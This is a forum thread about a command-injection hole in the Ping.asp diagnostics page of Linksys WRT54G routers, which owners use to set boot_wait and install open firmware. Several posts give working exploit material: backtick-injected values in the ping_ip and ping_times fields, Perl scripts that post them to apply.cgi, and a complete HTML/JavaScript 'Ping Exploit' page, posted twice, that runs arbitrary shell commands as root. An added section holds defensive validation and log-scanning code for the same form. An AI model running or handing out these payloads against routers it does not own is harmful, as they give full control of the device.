
WRT54G v2.02.7 & v2.04.3 Ping.asp hack works :)

Discussion in 'Cisco/Linksys Wireless Routers' started by nteusink, Jul 31, 2004.

  1. nteusink

    nteusink Network Guru Member

    I had a couple of problems with Satori, so I decided it would help a lot if I could execute commands on the official firmware so I could check ifconfig etcetera. I came up with the following:
    With the normal ping.asp hack, you enter the command in the ping_ip field, but Linksys checks this field in later firmware releases, so command execution is no longer possible there. However, there is another variable you send to the server: ping_times.
    This variable can still be used for command injection. In the normal web interface this is a pull-down menu, so you can't directly use that.

    The best way is probably a script (http://www.topfx.com/dist/wrt54gcli.pl) by Mina Naguib, designed to exploit the original ping.asp bug; you just have to change a couple of lines:
    Code:
    $IP       = "";
    $PORT     = "";
    $PASSWORD = "";
    
    Enter the correct values for your router between the quotes

    Code:
    "ping_times"    => "1",
    "ping_ip"       => "`$command >/tmp/ping.log 2>&1`",
    
    change to:
    Code:
    "ping_times"    => "`$command >/tmp/ping.log 2>&1`",
    "ping_ip"       => "127.0.0.1",
    


    Now execute the script using Linux perl (or, on Windows, ActiveState ActivePerl) and you should have a pseudo-telnet interface with your router.

    Another way is to surf to http://192.168.1.1/Ping.asp (assuming 192.168.1.1 is your router IP), save that page and edit it in Notepad. Add after
    Code:
    <title>
    the following code:
    Code:
    <base href="http://192.168.100.3/"> 
    Replace:
    Code:
    <SELECT name=ping_times> 
    <OPTION value=5 selected>5</OPTION>
    <OPTION value=10>10</OPTION>
    <OPTION value=0>Unlimited</OPTION></SELECT>
    
    With
    Code:
    <INPUT name=ping_times> 
    
    When you open the new HTML file you should have an input field for ping_times. Enter
    `ls > /tmp/ping.log`
    and click Ping; you should get a directory listing.

    Using a trick very similar to the one described here (the WRT54G Shell part): http://www.seattlewireless.net/~mattw/index.cgi/2003/07/
    I was able to upload a binary file (a MIPS-compiled hello world :)) and was able to execute it (hello world!).

    It's 5:35am now, I'll correct any typos in the morning (well... probably the afternoon ;))

    Cheers,

    Niels
     
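The post above makes the defender's point for us: later stock firmware validated ping_ip but still passed ping_times to a shell, so an allow-list on one field bought nothing. The following is an added example, written for this thread and not code from Linksys or from any poster, of what server-side validation of the whole Diagnostics/Ping form looks like, together with a triage of router access-log lines using the same checks. The field names (ping_ip, ping_times, submit_button, change_action, ...) and the pull-down values 5/10/0 are the ones visible in the thread's HTML; the request bodies and log lines are constructed, and the hostname rule and 31-character limit are assumptions taken from the form's maxLength.

```python
"""Allow-list validation and access-log triage for the WRT54G Ping form.

Added example for this thread, not Linksys firmware code.  Field names and
the pull-down values come from the thread's HTML; every sample request and
log line below is constructed.
"""
import ipaddress
import re
from urllib.parse import parse_qs

# The stock Ping.asp pull-down offers 5, 10 and Unlimited (0), nothing else.
ALLOWED_PING_TIMES = {"0", "5", "10"}

# Hostname of at most 31 characters (the form's maxLength), dot-separated
# labels of letters, digits and hyphens.  Assumed rule, not Linksys's.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,31}$)[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)*$"
)

# Characters that let a value escape a shell word.
SHELL_META = set("`$;|&<>(){}\\'\"\n\r")


def parse_params(query_or_body):
    """Decode x-www-form-urlencoded data into a flat dict (last value wins).
    parse_qs undoes %60 and '+', so an encoded backtick is seen as one."""
    return {k: v[-1] for k, v in parse_qs(query_or_body, keep_blank_values=True).items()}


def valid_ping_ip(value):
    """Accept a dotted-quad IPv4 address or a plain hostname, nothing else."""
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None


def validate_ping_request(params):
    """Return the list of violations; an empty list means the request may run."""
    problems = []
    if not valid_ping_ip(params.get("ping_ip", "")):
        problems.append("ping_ip: not an IPv4 address or plain hostname")
    if params.get("ping_times", "") not in ALLOWED_PING_TIMES:
        problems.append("ping_times: not one of the pull-down values 0/5/10")
    # Flag metacharacters in *any* field so a report can tell a typo from an
    # injection attempt; the allow-list above already rejects both.
    for name, value in sorted(params.items()):
        if SHELL_META & set(value):
            problems.append(f"{name}: shell metacharacters present")
    return problems


# Constructed request bodies: a benign submission, the two injection shapes
# the thread discusses (ping_ip and ping_times), and an out-of-range
# ping_times with no metacharacters at all.
COMMON = "submit_button=Ping&submit_type=start&action=Apply&change_action=gozila_cgi"
SAMPLE_BODIES = {
    "benign": COMMON + "&ping_ip=192.168.1.3&ping_times=5",
    "ping_ip_injection": COMMON + "&ping_ip=%60ls+-al+%2Fvar+%3E+%2Ftmp%2Fping.log+2%3E%261%60&ping_times=5",
    "ping_times_injection": COMMON + "&ping_ip=127.0.0.1&ping_times=%60ls+%3E+%2Ftmp%2Fping.log%60",
    "odd_but_harmless": COMMON + "&ping_ip=192.168.1.3&ping_times=50",
}

# Constructed Common Log Format lines.  Only GET requests expose parameters
# here; POST bodies would need request-body logging.
SAMPLE_LOG = "\n".join([
    '192.168.1.100 - - [31/Jul/2004:05:35:00 +0200] "GET /Ping.asp HTTP/1.1" 200 4120',
    '192.168.1.100 - - [31/Jul/2004:05:35:10 +0200] "GET /apply.cgi?' + SAMPLE_BODIES["benign"] + ' HTTP/1.1" 200 512',
    '192.168.1.100 - - [31/Jul/2004:05:36:02 +0200] "GET /apply.cgi?' + SAMPLE_BODIES["ping_ip_injection"] + ' HTTP/1.1" 200 512',
])
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')


def scan_access_log(text):
    """Return (client, timestamp, problems) for every Ping submission in the
    log that fails validation; submissions that pass are ignored."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, stamp, _method, target = m.groups()
        path, _, query = target.partition("?")
        if path != "/apply.cgi" or not query:
            continue
        params = parse_params(query)
        if params.get("submit_button") != "Ping":
            continue
        problems = validate_ping_request(params)
        if problems:
            hits.append((client, stamp, problems))
    return hits


if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(f"{name:22s} -> {validate_ping_request(parse_params(body)) or 'OK'}")
    for client, stamp, problems in scan_access_log(SAMPLE_LOG):
        print(f"{stamp} {client}: {'; '.join(problems)}")
```

The check is an allow-list rather than a deny-list on purpose: ping_times may only be one of the three values the pull-down offers, so a value that reached the shell unfiltered in the thread is rejected before any metacharacter scan runs, and the scan only adds a label to the report. Note that the HTML maxLength and the pull-down are client-side conveniences; as the posts above show, anyone can save the page and change them, so the limits have to be enforced in the CGI handler.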
  2. sune

    sune Network Guru Member

    Thanks!

    The modified perl script works like a charm :)

    /Sune
     
  3. nteusink

    nteusink Network Guru Member

    and it still works with 2.04.4 :D
     
  4. aputerguy

    aputerguy Network Guru Member

    Not working for me...

    I tried using the script from http://www.topfx.com/dist/wrt54gcli.pl
    but I keep getting the error message:

    "Failed to talk to http://192.168.1.1:80/apply.cgi: 500 Can't read entity body: Connection reset by peer"


    I then tried to isolate the problem by constructing the following 3 perl scripts.

    1. Simplest version where everything is encoded in the URI [WORKS]

    Code:
    #!/usr/bin/perl
    # Version 1: all parameters in the GET query string

    use strict;
    use warnings;
    use LWP::UserAgent;
    use HTTP::Request;

    my $passwd = "mypassword";
    my $ua = LWP::UserAgent->new;

    # One long URI; the original post wrapped it across two lines.
    my $uri = "http://192.168.1.1/apply.cgi?submit_button=Ping&submit_type=start&action=Apply&change_action=gozila_cgi&ping_ip=%60ls+-al+%2Fvar+%3E+%2Ftmp%2Fping.log+2%3E%261%60&ping_times=5";

    my $req = HTTP::Request->new(GET => $uri);

    # The router's admin account has an empty user name; only the password counts.
    $req->authorization_basic("", $passwd);
    my $res = $ua->request($req);

    # check the outcome: Ping.asp returns the log wrapped in a JavaScript
    # array ("var table = new Array( ... );"), so strip that wrapper and
    # print only the quoted lines
    if ($res->is_success) {
    my $string = $res->content;
    $string =~ s/.*var table = new Array\(\n//s;
    $string =~ s/.*"(.*)"/$1/g;
    $string =~ s/\n\);\W*var i = 0;.*//s;
    print $string;
    } else {
    print "Error: " . $res->status_line . "\n";
    }
    


    2. Stripped down version analogous to the original script [FAILS]

    Code:
    #!/usr/bin/perl
    # Version 2: the same parameters sent as a form-encoded POST body

    use strict;
    use warnings;
    use LWP::UserAgent;
    use HTTP::Request::Common qw(POST);

    my $passwd = "mypassword";
    my $ua = LWP::UserAgent->new;

    my $uri = "http://192.168.1.1/apply.cgi";
    # POST from HTTP::Request::Common URL-encodes the pairs and sets the
    # Content-Type header for us.
    my $req = POST $uri,
    [
    "submit_button" => "Ping",
    "submit_type" => "start",
    "action" => "Apply",
    "change_action" => "gozila_cgi",
    "ping_ip" => "`ls -al /var > /tmp/ping.log 2>&1`",
    "ping_times" => "5",
    ];

    $req->authorization_basic("", $passwd);
    my $res = $ua->request($req);

    # check the outcome (same response parsing as version 1)
    if ($res->is_success) {
    my $string = $res->content;
    $string =~ s/.*var table = new Array\(\n//s;
    $string =~ s/.*"(.*)"/$1/g;
    $string =~ s/\n\);\W*var i = 0;.*//s;
    print $string;
    } else {
    print "Error: " . $res->status_line . "\n";
    }
    

    Result is:
    First time it runs, I get back no output (i.e. success but status line is: 200 EOF)
    Second time it runs, I get an error:
    Error: 500 Can't read entity body: Connection reset by peer

    3. Similar version but using GET

    Code:
    #!/usr/bin/perl
    # Version 3: a GET request that carries the parameters in the request
    # body instead of the query string (unusual, but that is what this test did)

    use strict;
    use warnings;
    use LWP::UserAgent;
    use HTTP::Request;

    my $passwd = "mypassword";
    my $ua = LWP::UserAgent->new;

    my $uri = "http://192.168.1.1/apply.cgi";

    my $req = HTTP::Request->new(GET => $uri);
    # One long string; the original post wrapped it across two lines.
    $req->content("submit_button=Ping&submit_type=start&action=Apply&change_action=gozila_cgi&ping_ip=%60ls+-al+%2Fvar+%3E+%2Ftmp%2Fping.log+2%3E%261%60&ping_times=5");
    $req->authorization_basic("", $passwd);
    my $res = $ua->request($req);

    # check the outcome (same response parsing as version 1)
    if ($res->is_success) {
    my $string = $res->content;
    $string =~ s/.*var table = new Array\(\n//s;
    $string =~ s/.*"(.*)"/$1/g;
    $string =~ s/\n\);\W*var i = 0;.*//s;
    print $string;
    } else {
    print "Error: " . $res->status_line . "\n";
    }
    

    Again, result is:
    First time it runs, I get back no output (i.e. success but status line is: 200 EOF)
    Second time it runs, I get an error:
    Error: 500 Can't read entity body: Connection reset by peer
     
  5. wardini

    wardini Network Guru Member

    ping hack

    OK. Thanks for the help. I got the perl script to work with my new WRT54G version 2.0, Firmware Version v2.02.7

    But I still have a question. How do I perform the original set boot_wait command?

    I am trying to verify that the commands work first and I cannot get the show command to work.

    I do not understand why the original command had all of the */n characters. I tried just "show" and got nothing. I tried lots of variations including the ${IFS} stuff but I don't get anything.

    ls, and ps, and cat seem to work so I think I'm set up to do everything.

    Thanks for your help.
    Wardini
     
  6. wardini

    wardini Network Guru Member

    figured it out

    OK. I figured it out. I now know what *n/*n/ means. I think I realize that this was due to a limitation in command line length from the beginning. But I saw those instructions in about 5 places in searches and no one ever explained what that was all about.

    Anyway, I now have my boot_wait variable set to on using the perl script and the changes suggested in the original post. It looks like it will work for me and I didn't have to go back to an old version of the firmware.

    Wardini
     
  7. kinemax

    kinemax Network Guru Member

    What does the code <base href="http://192.168.100.3/"> do?
     
  8. kinemax

    kinemax Network Guru Member

    I got the perl script working (opening the cli).

    What are the commands I need to enter to enable the boot_wait?
     
  9. kinemax

    kinemax Network Guru Member

    I found out that the Linksys firmware version 2.04.4 still has the Ping.asp loop-hole and thus I was able to set boot_wait without resorting to the work-around above.
     
  10. jippers

    jippers Network Guru Member

    I have the perl cli working, although i'm having problems running
    Code:
    /usr/sbin/wl -i eth2 txpwr 84
    All that happens is wl spits out the help text to my terminal. A prior post mentions something about the */n and extra-long commands, but not how to use them in the script. Can someone shed some light?

    Thanks,

    John

    EDIT: I am using firmware 2.02.2. Also, if I run the above command with eth1, it seems to execute the command properly, that is, it prints nothing to the terminal. Is that what I should expect? If so, should it be eth1 and not eth2?
     
  11. jippers

    jippers Network Guru Member

    Ahhhh...

    So to change the txpower you don't need the whole -i ethx in the arguments. A simple /usr/bin/wl txpwr will return the current setting of the txpwr (0 to 255) and /usr/bin/wl txpwr XXX will set the txpwr.

    Whoo hoo!
     
  12. graz

    graz Guest

    firmware v3.03.6

    Hi to all,
    we are looking for an outbound proxy for our SIP phones. I read that the WRT54G could be the solution, but... I upgraded to the latest firmware version (Firmware Version: v3.03.6) and it doesn't work.
    I tried all the tricks explained here to modify boot_wait (I wanted to install OpenWrt), but no success.
    Any suggestion?
    Thanks to all
     
  13. immauss

    immauss Guest

    OK, I couldn't actually find anywhere how to enable the boot_wait with the fake CLI, in v2.04.4 firmware and V2 Hardware, so I hacked at it until I got it. Here's how ....

    From the CLI:

    Set boot_wait to on with:
    Code:
    /usr/sbin/nvram set boot_wait=on
    
    Commit the setting to NVRAM with:
    Code:
    /usr/sbin/nvram commit
    
    Reboot or power cycle.

    Make sure it took:
    Code:
    /usr/sbin/nvram get boot_wait
    
    
    If all is well, the last command will simply return "on".

    For some reason, after some commands, the CLI stops returning info. You just get a blank line (well, I do). Every time it does that, I have to reboot to get it to return anything again (even on an ls /). This however does not seem to affect the fact that the command is run, because both of the first two nvram commands returned nothing, but upon reboot, boot_wait was set on.
     
  14. chuleta7

    chuleta7 Network Guru Member

    Ok. So it means that if I recently upgraded the firmware to 3.03.6, I don't have the option to hack the tx power of the WRT54G?
     
  15. Paco_2345

    Paco_2345 Guest

    Success with Firmware v4.20.7, Aug. 18, 2005.

    I had to use the "ping_times" method, and the device insisted on having something on the "internet" port. It doesn't work with the "internet" port disconnected.

    I used a simple HTML file for the access:
    ------------------------------------------------
    <HTML><BODY>

    <FORM action=http://192.168.1.1/apply.cgi method=post name=ping>
    <INPUT name=submit_type type=hidden value=start>
    <INPUT name=action type=hidden value=Apply>
    <INPUT name=change_action type=hidden value=gozila_cgi>

    <CENTER>

    <INPUT maxLength=31 name=ping_ip size=31 value="192.168.1.3">


    <INPUT maxLength=128 name=ping_times size=128 value="` >/tmp/ping.log 2>&1` ">


    <INPUT name=submit_button type=submit value=Ping>

    </FORM>
    </BODY></HTML>
    ------------------------------------------------

    Enter the command in between the ` and the >/
    and press "Ping".
     
  16. wildgift

    wildgift Guest

    success on 4.20.6

    hardware: 4.0
    firmware: 4.20.6

    A variation on the above by paco worked. I used the source from the router. I had the base href set to 192.168.1.1 (so the js files would load). Commented out the line of code in init(). (I suspect paco's way is better.)

    After each command, I clicked the back button and entered the next command. Note that each command is wrapped in backticks.

    `/usr/sbin/nvram set boot_wait=on`
    `/usr/sbin/nvram commit`
    `/usr/sbin/nvram get boot_wait > /tmp/ping.log`

    The last command returns "yes".

    Thanks everyone!
     
  17. robertmena

    robertmena Guest

    Tips for 4.20.6 and Hardware version 3.0?

    Hi, I've read the http://wiki.openwrt.org/OpenWrtDocs/Installing and this forum but still can't install the image for openwrt.

    Any tips regarding my setup ?

    4.20.6 and Hardware version 3.0
     
  18. Uranium235

    Uranium235 Guest

    Ping Exploit in HTML(/JS)

    Try this...

    Log into your router's web interface first for authorization (any/first page will do).
    Cut and paste the below into a new .htm file and open it in your browser.

    H/W V 2.0
    Firmware V 4.20.8 ETSI

    Uranium235

    ----- Snip -----
    <HTML>
    <HEAD>
    <TITLE>Linksys WRT54G Ping Exploit</TITLE>
    <META name="author" content="Uranium235">
    </HEAD>
    <SCRIPT language="javascript">
    //<!--
    function cmd_submit(F)
    {
    F.action = "http://" + F.ping_ip.value + "/apply.cgi";
    if (F.submit_button.value != "Ping")
    {
    F.submit_button.value = "Ping";
    F.ping_times.value = "`" + F.ping_times.value + " >/tmp/ping.log`";
    }
    return true;
    }
    function cmd_reset(F)
    {
    F.ping_times.value = "";
    F.submit_button.value = "Send";
    window.frames.response.location.href = "about:blank";
    return true;
    }
    function cmd_bootwon(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram set boot_wait=on";
    return true;
    }
    function cmd_nvcommit(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram commit";
    return true;
    }
    function cmd_bwget(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram get boot_wait";
    return true;
    }
    function cmd_nvshow(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram show";
    return true;
    }
    //-->
    </SCRIPT>
    <BODY onLoad="cmd_reset(document.forms.ping);">
    <H2>Linksys WRT54G Ping Exploit</H2>
    <H4>Type in any command as if you were typing at a local shell (with JS)

    Piping commands is possible (e.g. cd sbin|ls)

    IP is your router's IP-Address (Default: 192.168.1.1)</H4>
    <FORM name="ping" action="http://192.168.1.1/apply.cgi" method="post" target="response" onSubmit="cmd_submit(this);return true;">

    <INPUT name="submit_type" type="hidden" value="start">
    <INPUT name="change_action" type="hidden" value="gozila_cgi">
    IP:
    <INPUT name="ping_ip" maxlength=15 size=15 value="192.168.1.1" onFocus="this.select();">
    <INPUT name="ping_times" maxlength=128 size=50 value="" onFocus="this.select();">
    <INPUT name="submit_button" type="submit" value="Ping">
    </FORM>
    <INPUT name="btn_reset" type="button" value="Reset" onClick="cmd_reset(document.forms.ping);">
    <INPUT name="btn_bootwon" type="button" value="Set boot_wait ON" onClick="cmd_bootwon(document.forms.ping);">
    <INPUT name="btn_nvcommit" type="button" value="Commit NVRAM" onClick="cmd_nvcommit(document.forms.ping);">
    <INPUT name="btn_bwget" type="button" value="Get boot_wait" onClick="cmd_bwget(document.forms.ping);">
    <INPUT name="btn_nvshow" type="button" value="Show NVRAM" onClick="cmd_nvshow(document.forms.ping);">




    <IFRAME name="response" src="about:blank" width="525" height="300" frameborder="1"></IFRAME>
    </BODY>
    </HTML>
    ----- Snip -----
     
  19. Aq_lynch

    Aq_lynch Network Guru Member

    lol

    :drinking:
     
  20. beakmyn

    beakmyn Network Guru Member

    Re: Ping Exploit in HTML(/JS)

    Using "Uranium235" HTML exploit

    WRT54GS CGN5
    Firmware: 4.70.6

    Worked flawlessly using the following setup

    Default Factory config
    WAN port connected with a valid DHCP address
     
  21. itsmeohmy

    itsmeohmy Network Guru Member

    enabling boot_wait not working

    Hmm, I can't seem to get boot_wait enabled. My client PC is on port 1 of the WRT, it has a valid WAN address (DHCP from my cable modem), and it was reset to the factory default settings.

    I have tried what is described in the OpenWRT wiki, I've tried Paco_2345's and wildgift's code, and Uranium235's Javascript code from this thread.

    When I try to enter the commands through the Administration-Diagnostics-Ping menu in the router's web interface the commands I enter are truncated after 31 characters, so that won't work either.

    Firmware Version : v1.05.3, Sep. 22, 2005
    Router Name : WRT54GSV4

    Anybody got any ideas?

    Dave
     
  22. wjlee1204

    wjlee1204 Guest

    Help me please !!

    Hi everyone ..

    I have a WRT54G v4.0 (Firmware: 4.20.7)

    I tried all the methods explained here to modify boot_wait (I wanted to install OpenWrt), but I failed...
    Thus I want to downgrade the firmware (4.20.6 or below), but I can't get 4.20.6 or a lower version. Only v4.20.7 is on the Linksys homepage.

    Where can I get v4.20.6 or lower version firmware?
    Or how can I solve this problem in my system condition (v4.0, firmware 4.20.7)?

    Thanks to all ..
     
  23. Cytomax

    Cytomax Network Guru Member

    EDIT: If there is ANYTHING I am missing, please let me know.
    I don't know if I am supposed to click on the button "Commit NVRAM" at the end of Step-5 to save the work; can somebody please reply with an answer.

    I thought it would be nice to have a formal guide on how to execute the ping hack. I just wanted to make it easier for everyone else that ever needs to do this. If anyone sees any mistakes or wants to add anything please let me know.

    This worked on a
    WRT54GS
    Version: 4
    Firmware: 1.05.0

    Step-1
    Copy and paste the code into notepad and name the file
    Uranium235 Linksys WRT54G Ping Exploit.html
    save the file to your desktop

    Code:
    <HTML>
    <HEAD>
    <TITLE>Linksys WRT54G Ping Exploit</TITLE>
    <META name="author" content="Uranium235">
    </HEAD>
    <SCRIPT language="javascript">
    //<!--
    function cmd_submit(F)
    {
    F.action = "http://" + F.ping_ip.value + "/apply.cgi";
    if (F.submit_button.value != "Ping")
    {
    F.submit_button.value = "Ping";
    F.ping_times.value = "`" + F.ping_times.value + " >/tmp/ping.log`";
    }
    return true;
    }
    function cmd_reset(F)
    {
    F.ping_times.value = "";
    F.submit_button.value = "Send";
    window.frames.response.location.href = "about:blank";
    return true;
    }
    function cmd_bootwon(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram set boot_wait=on";
    return true;
    }
    function cmd_nvcommit(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram commit";
    return true;
    }
    function cmd_bwget(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram get boot_wait";
    return true;
    }
    function cmd_nvshow(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram show";
    return true;
    }
    //-->
    </SCRIPT>
    <BODY onLoad="cmd_reset(document.forms.ping);">
    <H2>Linksys WRT54G Ping Exploit</H2>
    <H4>Type in any command as if you were typing at a local shell (with JS)
    
    Piping commands is possible (e.g. cd sbin|ls)
    
    IP is your router's IP-Address (Default: 192.168.1.1)</H4>
    <FORM name="ping" action="http://192.168.1.1/apply.cgi" method="post" target="response" onSubmit="cmd_submit(this);return true;">
    
    <INPUT name="submit_type" type="hidden" value="start">
    <INPUT name="change_action" type="hidden" value="gozila_cgi">
    IP:
    <INPUT name="ping_ip" maxlength=15 size=15 value="192.168.1.1" onFocus="this.select();">
    <INPUT name="ping_times" maxlength=128 size=50 value="" onFocus="this.select();">
    <INPUT name="submit_button" type="submit" value="Ping">
    </FORM>
    <INPUT name="btn_reset" type="button" value="Reset" onClick="cmd_reset(document.forms.ping);">
    <INPUT name="btn_bootwon" type="button" value="Set boot_wait ON" onClick="cmd_bootwon(document.forms.ping);">
    <INPUT name="btn_nvcommit" type="button" value="Commit NVRAM" onClick="cmd_nvcommit(document.forms.ping);">
    <INPUT name="btn_bwget" type="button" value="Get boot_wait" onClick="cmd_bwget(document.forms.ping);">
    <INPUT name="btn_nvshow" type="button" value="Show NVRAM" onClick="cmd_nvshow(document.forms.ping);">
    
    
    
    
    <IFRAME name="response" src="about:blank" width="525" height="300" frameborder="1"></IFRAME>
    </BODY>
    </HTML>
    
    Step-2
    Make sure you have a valid WAN IP
    What I did, and it should work for everyone, is
    Internet Connection Type: Static
    IP Address: 11.11.11.11
    Subnet Mask: 255.255.255.0
    Default Gateway: 11.11.11.1
    DNS: 205.152.144.23

    Step-3
    Go to your Desktop and click on
    Uranium235 Linksys WRT54G Ping Exploit.html

    Step-4
    Click on the button that says
    Set boot_wait ON
    The button that said "Ping" now changes to "Send"
    Click on the button that says "Send"
    Wait a few seconds for the screen to refresh

    Step-5
    Click on the button that says
    Get boot_wait
    The button that said "Ping" now changes to "Send"
    Click on the button that says "Send"
    Wait a few seconds for the screen to refresh
    You should now see the word "on"

    You are finished!!

    Thanks in Advance
    Eddie
     
  24. Craven

    Craven Network Guru Member

    Using "Uranium235" HTML exploit

    WRT54GS CGN4
    Firmware: 4.70.6

    Worked flawlessly using the following setup

    Default Factory config with a few minor changes such as a non-default IP address (192.168.2.30) and DHCP disabled (my LAN subnet is 192.168.2.0/24 with another active DHCP server).
    WAN port unconnected with a fake static IP address.

    Re-boot router. Select "set boot_wait on" and press 'Send'.
    After inner screen refreshes quickly scroll to the bottom right and press "Stop".

    Re-boot router again. Select "show nvram" and press 'Send'.
    Confirm boot-wait=on

    Sweet! :thumb:
     
  25. Infoly

    Infoly Guest

    Problem of installation of a new firmware.

    I have a CISCO-Linksys WRT54GL router, S/N CL7B1G....
    To develop a specific application on this system I wish to replace the original Linksys firmware, v4.30.7, Jun. 20, 2006, with an open firmware (OpenWrt, DD-WRT... I have not made the choice yet).
    Having read the extensive literature accessible on the Internet, I read that it was preferable to set boot_wait to ON.
    To be able to do that it is necessary to have access to the machine, and I cannot get there.
    - Web access to http://192.168.1.1 works and gives me access to the configuration menu.
    - And, among other things, to the page that allows loading a new firmware (which I do not want to do before having set boot_wait to ON).
    - From the console, the command ping 192.168.1.1 works.
    - The tftp connection to 192.168.1.1 works.

    On the other hand, there is no way to use the Linksys WRT54G Ping Exploit to set boot_wait to ON. None of the commands works, not even a simple ping! The answer is always the same: Network is unreachable.

    Can somebody tell me if there is a working means to set boot_wait to ON on a CISCO-Linksys WRT54GL S/N CL7B1G.... with firmware v4.30.7, Jun. 20, 2006.

    Please also share your experience to help me choose a firmware for:
    - An elementary application.
    - An application using Internet and WiFi (I use a D-Link DSL-G624T modem router, which is accessible without any problem).
    Thanks in advance
     
